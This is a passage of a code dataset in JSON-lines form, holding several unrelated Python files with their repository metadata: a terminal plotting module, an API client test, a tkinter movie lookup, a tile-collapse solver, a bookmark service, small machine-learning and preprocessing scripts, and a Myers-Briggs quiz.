self.linesep + # maximum\n self.linesep.join(lbl + line for lbl, line in zip(yaxis[2:], res.split(self.linesep)))\n )\n\n # add x axis\n xaxis = self._x_axis(xmin, xmax, label=self.x_label, with_y_axis=True)\n res = (\n res + self.linesep + # plot\n self.linesep.join(xaxis)\n )\n\n if legend:\n res += '\\n\\nLegend:\\n-------\\n'\n res += '\\n'.join([\n color('⎯⎯ {}'.format(p.label if p.label is not None else 'Label {}'.format(i)),\n fg=p.lc, mode=self.color_mode, no_color=not self.with_colors)\n for i, p in enumerate(self._plots)\n if isinstance(p, Plot)\n ])\n\n return res\n\n\nclass Plot(namedtuple('Plot', ['X', 'Y', 'lc', 'interp', 'label'])):\n\n @classmethod\n def create(cls, X, Y, lc, interp, label): # noqa: N803\n if len(X) != len(Y):\n raise ValueError('X and Y dim have to be the same.')\n if interp not in ('linear', None):\n raise ValueError('Only \"linear\" and None are allowed values for `interp`.')\n\n return cls(X, Y, lc, interp, label)\n\n def width_vals(self):\n return self.X\n\n def height_vals(self):\n return self.Y\n\n def write(self, canvas, with_colors, in_fmt):\n # make point iterators\n from_points = zip(map(in_fmt.convert, self.X), map(in_fmt.convert, self.Y))\n to_points = zip(map(in_fmt.convert, self.X), map(in_fmt.convert, self.Y))\n\n # remove first point of to_points\n next(to_points)\n\n color = self.lc if with_colors else None\n # plot points\n for (x0, y0), (x, y) 
in zip(from_points, to_points):\n canvas.point(x0, y0, color=color)\n\n canvas.point(x, y, color=color)\n if self.interp == 'linear':\n canvas.line(x0, y0, x, y, color=color)\n\n\nclass Histogram(namedtuple('Histogram', ['X', 'bins', 'frequencies', 'buckets', 'lc'])):\n @classmethod\n def create(cls, X, bins, lc): # noqa: N803\n frequencies, buckets = hist(X, bins)\n\n return cls(X, bins, frequencies, buckets, lc)\n\n def width_vals(self):\n return self.X\n\n def height_vals(self):\n return self.frequencies\n\n def write(self, canvas, with_colors, in_fmt):\n # how fat will one bar of the histogram be\n x_diff = (canvas.dots_between(in_fmt.convert(self.buckets[0]), 0,\n in_fmt.convert(self.buckets[1]), 0)[0] or 1)\n bin_size = (in_fmt.convert(self.buckets[1]) - in_fmt.convert(self.buckets[0])) / x_diff\n\n color = self.lc if with_colors else None\n for i in range(self.bins):\n # for each bucket\n if self.frequencies[i] > 0:\n for j in range(x_diff):\n # print bar\n x_ = in_fmt.convert(self.buckets[i]) + j * bin_size\n\n if canvas.xmin <= x_ <= canvas.xmax:\n canvas.line(x_, 0,\n x_, self.frequencies[i],\n color=color)\n\n\ndef _limit(values):\n _min = 0\n _max = 1\n if len(values) > 0:\n _min = min(values)\n _max = max(values)\n\n return (_min, _max)\n\n\ndef _diff(low, high):\n if low == high:\n if low == 0:\n return 0.5\n else:\n return abs(low * 0.1)\n else:\n delta = abs(high - low)\n if isinstance(delta, timedelta):\n return mk_timedelta(timestamp(delta) * 0.1)\n else:\n return delta * 0.1\n\n\ndef _default(low_set, high_set):\n if low_set is None and high_set is None:\n return 0.0, 1.0 # defaults\n\n if low_set is None and high_set is not None:\n if high_set <= 0:\n return high_set - 1, high_set\n else:\n return 0.0, high_set\n\n if low_set is not None and high_set is None:\n if low_set >= 1:\n return low_set, low_set + 1\n else:\n return low_set, 1.0\n\n # Should never get here! => checked in function before\n\n\ndef _choose(low, high, low_set, high_set):\n no_data = low is None and high is None\n if no_data:\n return _default(low_set, high_set)\n\n else: # some data\n if low_set is None and high_set is None:\n # no restrictions from user, use low & high\n diff = _diff(low, high)\n return low - diff, high + diff\n\n if low_set is None and high_set is not None:\n # user sets high end\n if high_set < low:\n # high is smaller than lowest value\n return high_set - 1, high_set\n\n diff = _diff(low, high_set)\n return low - diff, high_set\n\n if low_set is not None and high_set is None:\n # user sets low end\n if low_set > high:\n # low is larger than highest value\n return low_set, low_set + 1\n\n diff = _diff(low_set, high)\n return low_set, high + diff\n\n # Should never get here! 
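# Illustrative usage sketch for the Figure class defined above, assuming the
# module is importable under the upstream package name `plotille` (the
# vendored path in this repo differs); guarded so it stays runnable either way.
try:
    import plotille
    fig = plotille.Figure()
    fig.width, fig.height = 60, 20
    fig.set_x_limits(min_=0, max_=10)
    fig.plot(list(range(11)), [x * x for x in range(11)], label='x^2')
    print(fig.show(legend=True))
except ImportError:
    pass  # plotille not installed; sketch only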
=> checked in function before\n","repo_name":"louisYen/S3R","sub_path":"anomaly/utilities/plotille/plotille/_figure.py","file_name":"_figure.py","file_ext":"py","file_size_in_byte":17071,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"37"} +{"seq_id":"16345132312","text":"import os\nfrom .core_function import client_search_testing\n\nimport pytest\nfrom emmet.core.molecules.summary import HasProps\n\nfrom mp_api.client.routes.molecules.summary import MoleculesSummaryRester\n\nexcluded_params = [\n \"sort_fields\",\n \"chunk_size\",\n \"num_chunks\",\n \"all_fields\",\n \"fields\",\n \"exclude_elements\",\n \"has_props\"\n]\n\nalt_name_dict = {\"formula\": \"formula_alphabetical\", \"molecule_ids\": \"molecule_id\"}\n\ncustom_field_tests = {\n \"molecule_ids\": [\"351ef090ebd90b661a4e1205756f6957-C1Mg1N2O1S1-m2-1\"],\n \"formula\": \"C2 H4\",\n \"chemsys\": \"C-H\",\n \"elements\": [\"P\"],\n \"has_solvent\": \"DIELECTRIC=18,500;N=1,415;ALPHA=0,000;BETA=0,735;GAMMA=20,200;PHI=0,000;PSI=0,000\",\n \"has_level_of_theory\": \"wB97X-V/def2-TZVPPD/SMD\",\n \"has_lot_solvent\": \"wB97X-V/def2-TZVPPD/SMD(SOLVENT=THF)\",\n \"nelements\": 2,\n \"charge\": 1,\n \"spin_multiplicity\": 1,\n \"has_props\": [HasProps.orbitals],\n} # type: dict\n\n@pytest.mark.skip(reason=\"Temporary until data adjustments\")\n@pytest.mark.skipif(\n os.environ.get(\"MP_API_KEY\", None) is None, reason=\"No API key found.\"\n)\ndef test_client():\n search_method = MoleculesSummaryRester().search\n\n client_search_testing(\n search_method=search_method,\n excluded_params=excluded_params,\n alt_name_dict=alt_name_dict,\n custom_field_tests=custom_field_tests,\n sub_doc_fields=[],\n )\n","repo_name":"materialsproject/api","sub_path":"tests/molecules/test_summary.py","file_name":"test_summary.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":80,"dataset":"github-code","pt":"37"} +{"seq_id":"20654673705","text":"from tkinter import *\nfrom tkinter import ttk\nimport requests\ndef getInfo():\n root.geometry(\"410x450\")\n user_select_title=combo_title.get()\n result={}\n\n for i in apiresponse[\"data\"]:\n if i[\"title\"] == user_select_title:\n result=i\n print(result)\n print(result[\"title\"])\n\n lbl_result=Label(root,text=f\"year:{result['year']} / genres:{result['genres']}\",bg=\"#E7D4B5\")\n lbl_result.grid(columnspan=2,pady=10)\n\nresponse = requests.get(\"http://moviesapi.ir/api/v1/movies\")\napiresponse=response.json()\ntitleList=[]\nmovieInfo=apiresponse[\"data\"]\n\nroot=Tk()\nroot.config(bg=\"#E7D4B5\")\nroot.geometry(\"410x150+1+1\")\nroot.title(\"API\")\nlbl_title=Label(root,text=\"title\",font=('Times',24),bg=\"#E7D4B5\")\n\nfor i in range(len(movieInfo)):\n dic=movieInfo[i]\n if dic[\"title\"] in titleList:\n pass\n else:\n titleList.append(dic[\"title\"])\ncombo_title=ttk.Combobox(root,values=titleList,font=('Times',20))\nprint(f\"title:{titleList}\")\nbtn=Button(root,text=\"Enter\",bg=\"#A0937D\",width=9,height=3,command=getInfo)\n\n\n\n#grid\nlbl_title.grid(row=0,column=0,pady=10,padx=10)\ncombo_title.grid(row=0,column=1)\nbtn.grid(row=1,column=1,pady=15)\nroot.mainloop()","repo_name":"soheila76/Term-3","sub_path":"APIFilm/withTitleT3.py","file_name":"withTitleT3.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27043827206","text":"from __future__ import annotations\n\nfrom random import choice\nfrom 
.wfc_abstract import WFCAbstract\nfrom .board import Board2d, BoardTile\nfrom .superposition_tile import SuperpositionTile\n\n_TileSideFormat = int\n\n_TileRulesFormat = tuple[\n _TileSideFormat, # left\n _TileSideFormat, # top\n _TileSideFormat, # right\n _TileSideFormat, # bottom\n]\n\n\nclass TileRules:\n def __init__(self, rules: tuple[int, int, int, int]):\n self.rules = rules\n\n def __str__(self):\n return str(self.rules)\n\n def __repr__(self):\n return str(self)\n\n def __getitem__(self, item):\n return self.rules[item]\n\n def compare(self, collapse_rules: CollapseRules, tile_type: int, side: int) -> bool:\n return collapse_rules.rules[tile_type][side] == self[(side - 2) % 4]\n\n\nclass CollapseRules:\n def __init__(self, rules: dict[int, TileRules], chance: dict[int, int] | None = None):\n self.rules = rules\n self.chance = chance\n\n @classmethod\n def parse(cls, rules: dict[int, _TileRulesFormat], chance: dict[int, int] | None = None):\n rules_dict = {r: TileRules(rules[r]) for r in rules}\n return cls(rules_dict, chance)\n\n def collapse(self, superpositions: set[int], orientation: int, tile_type: set[int]):\n if not len(tile_type):\n return superpositions\n\n valid: set[int] = set()\n\n for superposition in superpositions:\n for tile in tile_type:\n if self.rules[superposition].compare(self, tile, orientation):\n valid.add(superposition)\n return valid\n\n def collapse_around(self, tile: BoardTile[SuperpositionTile]) -> set[int]:\n ret = tile.tile.superpositions\n\n if tile.tile.collapsed:\n return ret\n\n if tile.left:\n ret = self.collapse(ret, 0, tile.left.tile.superpositions)\n if tile.right:\n ret = self.collapse(ret, 2, tile.right.tile.superpositions)\n if tile.up:\n ret = self.collapse(ret, 1, tile.up.tile.superpositions)\n if tile.down:\n ret = self.collapse(ret, 3, tile.down.tile.superpositions)\n\n return ret\n\n def get_options(self, superpositions: set[int], orientation: int, tile_type: set[int]) -> list[int]:\n valid = self.collapse(superpositions, orientation, tile_type)\n\n ret = []\n\n for superposition in valid:\n if self.chance is None or superposition not in self.chance:\n ret.append(superposition)\n else:\n ret += [superposition] * self.chance[superposition]\n return ret\n\n\nclass Collapse(WFCAbstract):\n def __init__(self, board: Board2d[SuperpositionTile], rules: CollapseRules):\n super().__init__(board)\n self.rules = rules\n\n def calculate_valid_superpositions(self, tile: BoardTile[SuperpositionTile]):\n ret = []\n\n if tile.left:\n ret += (self.rules.get_options(tile.tile.superpositions, 0, tile.left.tile.superpositions))\n if tile.up:\n ret += (self.rules.get_options(tile.tile.superpositions, 1, tile.up.tile.superpositions))\n if tile.right:\n ret += (self.rules.get_options(tile.tile.superpositions, 2, tile.right.tile.superpositions))\n if tile.down:\n ret += (self.rules.get_options(tile.tile.superpositions, 3, tile.down.tile.superpositions))\n\n return ret\n\n def collapse_tile(self, tile: BoardTile[SuperpositionTile]):\n if not tile.tile.collapsed:\n tile.tile.superpositions = {choice(self.calculate_valid_superpositions(tile))}\n\n def select_tile_to_collapse(self, tiles: set[BoardTile[SuperpositionTile]]) -> BoardTile[SuperpositionTile]:\n return tiles.pop()\n\n def reduce_tile(self, tile: BoardTile[SuperpositionTile]):\n before = tile.tile.superpositions\n tile.tile.superpositions = self.rules.collapse_around(tile)\n return before != tile.tile.superpositions\n\n\n__all__ = ['Collapse', 'CollapseRules', 
'TileRules']\n","repo_name":"gresm/pygame-summer-2022","sub_path":"wfcollapse/wfc_old.py","file_name":"wfc_old.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20459952676","text":"def naturals():\n \"\"\"A generator function that yields the infinite sequence of natural\n numbers, starting at 1.\n\n >>> m = naturals()\n >>> type(m)\n <class 'generator'>\n >>> [next(m) for _ in range(10)]\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n \"\"\"\n i = 1\n while True:\n yield i\n i += 1\n\n\n\n\ndef hailstone(n):\n \"\"\"\n >>> for num in hailstone(10):\n ... print(num)\n ...\n 10\n 5\n 16\n 8\n 4\n 2\n 1\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n while n > 1:\n yield n\n if n % 2 == 0:\n n = n // 2\n else:\n n = n * 3 + 1\n yield 1","repo_name":"ykangli/cs61a-rep","sub_path":"lab07/lab07.py","file_name":"lab07.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30167936626","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\nfrom crestify.models import db, Bookmark, User, Tag\nfrom crestify.services import archive\n\n\ndef new(url, user_id, description=None, tags=None, title=None, added=None):\n new_bookmark = Bookmark()\n new_bookmark.main_url = url[:2000]\n if title is not None:\n new_bookmark.title = title[:1024]\n if description is not None:\n new_bookmark.description = description[:256]\n new_bookmark.user = user_id\n if added is None:\n new_bookmark.added_on = datetime.utcnow()\n else:\n try:\n datetime.utcfromtimestamp(added)\n new_bookmark.added_on = added # UNIX timestamp in seconds since epoch, only\n except ValueError:\n new_bookmark.added_on = datetime.utcnow()\n new_bookmark.deleted = False\n if tags is not None:\n tags = tags.split(',')\n new_bookmark.tags = tags\n for tag in tags:\n # If tag is present, increment counter by one, or create if not present\n get_tag = Tag.query.filter_by(text=tag,\n user=user_id).first()\n if not get_tag:\n new_tag = Tag(text=tag, user=user_id)\n new_tag.count = 1\n db.session.add(new_tag)\n else:\n get_tag.count += 1\n db.session.add(new_bookmark)\n db.session.commit()\n # Send off for archiving\n archive.do_archives(new_bookmark)\n return new_bookmark\n\n\ndef delete(id, user_id):\n delete_bookmark = Bookmark.query.get(id)\n if delete_bookmark.user == user_id:\n delete_bookmark.deleted = True\n tags = delete_bookmark.tags\n # If tags are present, we'll want to decrement their counts here\n if tags and len(tags) > 0:\n for tag in tags:\n get_tag = Tag.query.filter_by(text=tag,\n user=user_id).first()\n if get_tag:\n get_tag.count -= 1\n db.session.commit()\n\n\ndef per_page(user_id, per_page):\n per_page_bookmarks = User.query.get(user_id)\n per_page_bookmarks.bookmarks_per_page = per_page\n db.session.commit()\n\n\ndef edit(id, user_id, title=None, description=None, tags=None):\n edit_bookmark = Bookmark.query.get(id)\n if title is not None:\n edit_bookmark.title = title[:1024]\n if description is not None:\n edit_bookmark.description = description[:256]\n if tags != \"\" and tags is not None:\n if type(tags) is unicode:\n ls1 = edit_bookmark.tags or []\n ls2 = tags.split(',') or []\n # Compute deltas between new and current tags\n added_tags = set(ls1 + ls2) - set(ls1)\n removed_tags = set(ls1 + ls2) - set(ls2)\n for tag in added_tags:\n get_tag = Tag.query.filter_by(text=tag,\n user=user_id).first()\n if not get_tag:\n new_tag = Tag(text=tag, 
user=user_id)\n new_tag.count = 1\n db.session.add(new_tag)\n else:\n get_tag.count += 1\n for tag in removed_tags:\n get_tag = Tag.query.filter_by(text=tag,\n user=user_id).first()\n if not get_tag:\n pass\n else:\n get_tag.count -= 1\n edit_bookmark.tags = ls2\n db.session.commit()\n\n\ndef api_edit(id, tags, user_id):\n edit_bookmark = Bookmark.query.get(id)\n ls1 = edit_bookmark.tags or []\n ls2 = tags\n added_tags = None\n removed_tags = None\n if tags != ['']:\n if ls1:\n added_tags = set(ls1 + ls2) - set(ls1)\n removed_tags = set(ls1 + ls2) - set(ls2)\n else:\n added_tags = set(ls2)\n if added_tags:\n for tag in added_tags:\n get_tag = Tag.query.filter_by(text=tag,\n user=user_id).first()\n if not get_tag:\n new_tag = Tag(text=tag, user=user_id)\n new_tag.count = 1\n db.session.add(new_tag)\n else:\n get_tag.count += 1\n edit_bookmark.tags = ls2\n else:\n removed_tags = set(edit_bookmark.tags)\n edit_bookmark.tags = []\n if removed_tags:\n for tag in removed_tags:\n get_tag = Tag.query.filter_by(text=tag,\n user=user_id).first()\n if not get_tag:\n pass\n else:\n get_tag.count -= 1\n db.session.commit()\n","repo_name":"dhamaniasad/crestify","sub_path":"crestify/services/bookmark.py","file_name":"bookmark.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","stars":256,"dataset":"github-code","pt":"37"} +{"seq_id":"29105768540","text":"import math\ndef sieve_all_prime(n):\n sieve = [True]*(n+1)\n spf = [0]*(n+1)\n\n for i in range(n+1):\n spf[i] = i \n\n sieve[0]= False\n sieve[1] = False\n\n for i in range(2, int(math.sqrt(n))+1):\n if sieve[i]:\n for j in range(i*i, n+1, +i):\n if spf[j] == j:\n spf[j] = i\n sieve[j] = False\n print(len(spf))\n return spf\n\n\ndef solve(A):\n spf = sieve_all_prime(1000000)\n for i in range(len(A)):\n total = 1\n x = A[i]\n while x > 1:\n f = spf[x]\n count = 0\n while (x % f) == 0:\n count += 1\n x= (x // f)\n \n total *= (count+1)\n A[i] = total\n return A\n \n\nA = [2,3,4,5]\n# A = [72]\nprint(sieve_all_prime(10))\nprint(solve(A))","repo_name":"chithra-m/ds_code_snippets","sub_path":"course/count_of_divisors.py","file_name":"count_of_divisors.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35824560016","text":"import json\nimport os\nimport string\nimport sys\nfrom io import open\n\nfrom fol_preprocess import*\n\nprint(\"load train data file\")\nwith open('../../MedEX/Data/new_2hops/Final_2hops_MashQA_kg_train_data.json','r') as f:\n mash_train_data=json.load(f)\n\n\ntrain_data=[]\n\nfor item,val in enumerate(mash_train_data):\n\tprint(\"context no: \",item)\n\tqq=[]\n\tfor qa in mash_train_data[item][\"qas\"]:\n\t\tanswers=[]\n\t\tanswers.append({\"text\":qa[\"answers\"][0][\"text\"], \"answer_start\":qa[\"answers\"][0][\"answer_start\"]})\n\t\tquestion_text =qa[\"question\"]\n\t\tr1,r2,r3,r4,r5,r6 = apply_rules_to_kg(qa['kg_triplets'])\n\t\tq = {\n\t\t\t\"id\":qa[\"id\"],\n\t\t\t\"is_impossible\": qa[\"is_impossible\"],\n\t\t\t\"question\": qa[\"question\"],\n\t\t\t\"kg_triplets\": qa['kg_triplets'],\n\t\t\t\"rule_1\": r1,\n\t\t\t\"rule_2\": r2,\n\t\t\t\"rule_3\": r3,\n\t\t\t\"rule_4\": r4,\n\t\t\t\"rule_5\": r5,\n\t\t\t\"rule_6\": r6,\n\t\t\t\"answers\": answers\n\t\t}\n\t\tqq.append(q)\n\ttrain 
={\n\t\t\t\"context\":mash_train_data[item][\"context\"],\n\t\t\t\"qas\":qq\n\t}\n\ttrain_data.append(train)\n\nfile_name='../Data/2_hops/Final_2hops_MashQA_kg_train_data_with_rule.json'\nprint(file_name)\nwith open(file_name, 'w') as fp:\n\tjson.dump(train_data, fp, indent=4)\n\n\n","repo_name":"aizanzafar/MedEx","sub_path":"code/ExtractiveQA/Preprocess/data_preprocess.py","file_name":"data_preprocess.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40664201045","text":"import torch.nn as nn\n\n\nclass LemonsNet(nn.Module):\n def __init__(self):\n super(LemonsNet, self).__init__()\n self.l1 = nn.Linear(14, 512)\n self.l2 = nn.Linear(512, 128)\n self.l3 = nn.Linear(128, 64)\n self.l_out = nn.Linear(64, 1)\n\n self.relu = nn.ReLU()\n self.dropout = nn.Dropout(p=0.1)\n self.bn1 = nn.BatchNorm1d(512)\n self.bn2 = nn.BatchNorm1d(128)\n self.bn3 = nn.BatchNorm1d(64)\n\n def forward(self, x):\n x = self.relu(self.l1(x))\n x = self.bn1(x)\n x = self.relu(self.l2(x))\n x = self.bn2(x)\n x = self.dropout(x)\n x = self.relu(self.l3(x))\n x = self.bn3(x)\n x = self.dropout(x)\n\n out = self.l_out(x)\n\n return out\n","repo_name":"BahaNordi/LemonsDetection","sub_path":"lemons_net.py","file_name":"lemons_net.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18388593497","text":"import os, shutil\nimport subprocess\ndef preprocessing():\n src = \"images\"\n dst = \"processed\"\n\n # clear output dir\n if os.path.isdir(dst):\n for filename in os.listdir(dst):\n file_path = os.path.join(dst, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print('Failed to delete %s. 
Reason: %s' % (file_path, e))\n \n # process all input images\n for root, dirs, files in os.walk(src):\n for file in files:\n if (root != \"images/gridded\"): continue\n if file.endswith(\".jpg\") or file.endswith(\".png\"):\n subprocess.run([\"python3\", \"main.py\", \"-i\", os.path.join(root, file)])\n\ndef main():\n preprocessing()\n\nif __name__ == \"__main__\":\n main()","repo_name":"tommy2022/TableRecognition","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25092632929","text":"# setup.py\nfrom distutils.core import setup, Extension\n\nimport numpy\n\ntry:\n numpy_include = numpy.get_include()\nexcept AttributeError:\n numpy_include = numpy.get_numpy_include()\n\n \n# c3 = Extension('_c3',\n# ['c3.i'],\n# include_dirs = [\n# numpy_include,\n# '../../include',\n# '../../src/lib_array',\n# '../../src/lib_clinalg',\n# '../../src/lib_funcs',\n# '../../src/lib_optimization',\n# '../../src/lib_linalg',\n# '../../src/lib_probability',\n# '../../src/lib_quadrature',\n# '../../src/lib_stringmanip',\n# '../../src/lib_superlearn',\n# '../../src/lib_interface',\n# ],\n# define_macros =[('COMPILE_WITH_PYTHON',None)],\n# undef_macros = [],\n# language='c',\n# runtime_library_dirs=['../../build/src'],\n# library_dirs = ['../../build/src'],\n# # extra_link_args=['-Wl,-R/Users/aagorod/Software/c3/build/src'],\n# # library_dirs = ['/Users/aagorod/Software/c3/lib'],\n# libraries = ['c3'],\n# extra_compile_args = ['-std=c99'],\n# )\n\npcback = Extension('pycback',\n sources = ['python_caller.c'],\n include_dirs = [\n numpy_include,\n ],\n language='c',\n extra_compile_args=['-std=c99'])\n\n\nsetup(\n name = \"c3\",\n version = \"1.0\",\n # ext_modules=[c3,pcback]\n ext_modules=[pcback]\n)\n\n# ~/Software/c3_installed/lib/c3/\n","repo_name":"stellarscience/dakota-stellar","sub_path":"packages/external/C3/wrappers/python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"9807229881","text":"#!/usr/bin/python3\r\n# Project Name: Insights\r\n# Author: Andrew Eng\r\n# Original Creation Date: 2020-09-20\r\n# Summary: This is the Myers Briggs Personality Test. This initial code base is taken from the MBTI Self Scorable Form by Katharine C. Briggs and Isabel Briggs Myers. 
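# Illustrative sketch (a hypothetical rewrite, not the author's code): the
# scorer below keeps eight counters and bumps one pole per answer via eval().
# A compact table-driven equivalent makes the idea explicit: each question
# carries a two-letter key such as "jp", where answer 'a' scores the first
# letter and 'b' scores the second.
#
#     from collections import Counter
#     scores = Counter()
#     def score(mb_key, response):
#         scores[mb_key[0 if response == 'a' else 1].upper()] += 1
#     score('jp', 'a'); score('ei', 'b'); score('jp', 'b')
#     assert scores == Counter({'J': 1, 'I': 1, 'P': 1})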
\r\n\r\n# Version Control\r\n\r\ne = 0\r\ns = 0\r\nt = 0\r\nj = 0\r\ni = 0\r\nn = 0\r\nf = 0\r\np = 0\r\nresponse = \"\"\r\nquestions = \"\"\r\npreference = []\r\n\r\n# Evaluate J and P\r\ndef eval(evaluation, response, question):\r\n\t# Questions Part 1: 1, 10, 20, 9\r\n\t# Questions Part 2: 28, 36, 43, 49\r\n\t# Questions Part 3: 59, 70, 58\r\n\tglobal e, s, t, j, i, n, f, p\r\n\r\n\tdef invalid():\r\n\t\tprint(\"##########################################\")\r\n\t\tprint(\"\\n>>>> Invalid Response, try again: <<<<\\n\")\r\n\t\tprint(\"##########################################\")\r\n\t\tresponse = input(question)\r\n\t\teval(evaluation, response.lower(), question)\r\n\r\n\tif evaluation == \"jp\":\r\n\t\tif response == \"a\":\r\n\t\t\tj = j+1\r\n\t\t\treturn j\r\n\t\tif response == \"b\":\r\n\t\t\tp = p+1\r\n\t\t\treturn p\r\n\t\telse:\r\n\t\t\tinvalid()\r\n\r\n\tif evaluation == \"pj\":\r\n\t\tif response == \"a\":\r\n\t\t\tp = p+1\r\n\t\t\treturn p\r\n\t\tif response == \"b\":\r\n\t\t\tj = j+1\r\n\t\t\treturn j\r\n\t\telse:\r\n\t\t\tinvalid()\r\n\r\n\tif evaluation == \"ie\":\r\n\t\tif response == \"a\":\r\n\t\t\ti = i+1\r\n\t\t\treturn i\r\n\t\tif response == \"b\":\r\n\t\t\te = e+1\r\n\t\t\treturn e\r\n\t\telse:\r\n\t\t\tinvalid()\r\n\r\n\tif evaluation == \"ei\":\r\n\t\tif response == \"a\":\r\n\t\t\te = e+1\r\n\t\t\treturn e\r\n\t\tif response == \"b\":\r\n\t\t\ti = i+1\r\n\t\t\treturn i\r\n\t\telse:\r\n\t\t\tinvalid()\r\n\r\n\tif evaluation == \"sn\":\r\n\t\tif response == \"a\":\r\n\t\t\ts = s+1\r\n\t\t\treturn s\r\n\t\tif response == \"b\":\r\n\t\t\tn = n+1\r\n\t\t\treturn n\r\n\t\telse:\r\n\t\t\tinvalid()\r\n\r\n\tif evaluation == \"ns\":\r\n\t\tif response == \"a\":\r\n\t\t\tn = n+1\r\n\t\t\treturn n\r\n\t\tif response == \"b\":\r\n\t\t\ts = s+1\r\n\t\t\treturn s\r\n\t\telse:\r\n\t\t\tinvalid()\r\n\r\n\tif evaluation == \"ft\":\r\n\t\tif response == \"a\":\r\n\t\t\tf = f+1\r\n\t\t\treturn f\r\n\t\tif response == \"b\":\r\n\t\t\tt = t+1\r\n\t\t\treturn t\r\n\t\telse:\r\n\t\t\tinvalid()\r\n\r\n\tif evaluation == \"tf\":\r\n\t\tif response == \"a\":\r\n\t\t\tt = t+1\r\n\t\t\treturn t\r\n\t\tif response == \"b\":\r\n\t\t\tf = f+1\r\n\t\t\treturn f\r\n\t\telse:\r\n\t\t\tinvalid()\r\n\r\ndef part1():\r\n\tprint(\"\\n###############################################################################\")\r\n\tprint(\"#### Which answer comes closest to describing how you usually feel or act? ####\")\r\n\tprint(\"###############################################################################\")\r\n\r\ndef part2():\r\n\tprint(\"\\n###################################################################################################################################\")\r\n\tprint(\"#### Which word in each pair appeals to you more? Think about what the words mean, not about how they look or how they sound. ####\")\r\n\tprint(\"###################################################################################################################################\")\r\n\r\ndef part3():\r\n\tprint(\"\\n###############################################################################\")\r\n\tprint(\"#### Which answer comes closest to describing how you usually feel or act? ####\")\r\n\tprint(\"###############################################################################\")\r\n\r\ndef part4(): \r\n\tprint(\"\\n###################################################################################################################################\")\r\n\tprint(\"#### Which word in each pair appeals to you more? 
Think about what the words mean, not about how they look or how they sound. ####\")\r\n\tprint(\"###################################################################################################################################\")\r\n\r\ndef execute(que_no, question, answer_a, answer_b, mb):\r\n\trequest = f\"\\n{que_no}. {question} {answer_a}\\n {answer_b}\\n Input: \"\r\n\tresponse = input(request)\r\n\teval(mb, response.lower(), request)\r\n\r\npart1()\r\nque_no = 1\r\nanswer_a = \" [a] plan what you do and when\"\r\nanswer_b = \" [b] just go?\"\r\nquestion = \"When you go somewhere for the day, would you rather\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 2\r\nanswer_a = \" [a] more of a spontaneous person\"\r\nanswer_b = \" [b] more of an organized person?\"\r\nquestion = \"Do you consider yourself to be\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 3\r\nanswer_a = \" [a] fact Courses\"\r\nanswer_b = \" [b] courses involving theory?\"\r\nquestion = \"If you were a teacher, would you rather teach\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 4\r\nanswer_a = \" [a] a good mixer\"\r\nanswer_b = \" [b] rather quiet and reserved?\"\r\nquestion = \"Are you usually\\n\"\r\nmb = \"ei\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 5\r\nanswer_a = \" [a] imaginative people\"\r\nanswer_b = \" [b] realistic people\"\r\nquestion = \"Do you usually get along better with\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 6\r\nanswer_a = \" [a] your heart rules your head\"\r\nanswer_b = \" [b] your head rules your heart\"\r\nquestion = \"Do you more often let\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 7\r\nanswer_a = \" [a] on the spur of the moment\"\r\nanswer_b = \" [b] according to your plans\"\r\nquestion = \"Do you prefer to do many things\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 8\r\nanswer_a = \" [a] easy to get to know\"\r\nanswer_b = \" [b] hard to get to know\"\r\nquestion = \"Are you\\n\"\r\nmb = \"ei\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 9\r\nanswer_a = \" [a] appeal to you\"\r\nanswer_b = \" [b] cramp you?\"\r\nquestion = \"Does following a schedule\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 10\r\nanswer_a = \" [a] organize it carefully before you start\"\r\nanswer_b = \" [b] find out what is necessary as you go along\"\r\nquestion = \"When you have a special job to do, do you like to\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, 